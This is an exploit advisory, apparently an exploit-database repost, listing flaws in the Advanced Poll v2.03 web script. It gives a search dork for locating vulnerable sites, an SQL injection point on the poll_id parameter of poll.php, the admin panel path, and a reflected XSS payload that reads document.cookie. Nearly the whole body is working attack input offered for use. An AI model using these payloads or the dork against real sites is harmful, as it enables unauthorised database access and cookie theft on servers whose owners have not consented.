facebook facebook twitter rss

Advanced Poll v2.03 Multiple Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 07-06-2012
Advanced Poll v2.03 Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.proxy2.de/
.:. Dork : "Powered by Advanced Poll Version 2.03"
#######################################################################

===[ Exploit ]===


Sql Injection
==============

http://SITE/poll.php?poll_id=31[sql]

Admin Panel:

http://SITE/admin/

Reflected Xss
==============


http://SITE/poll.php?poll_id='"<script>alert(document.cookie)</script>

#######################################################################

Like us on Facebook :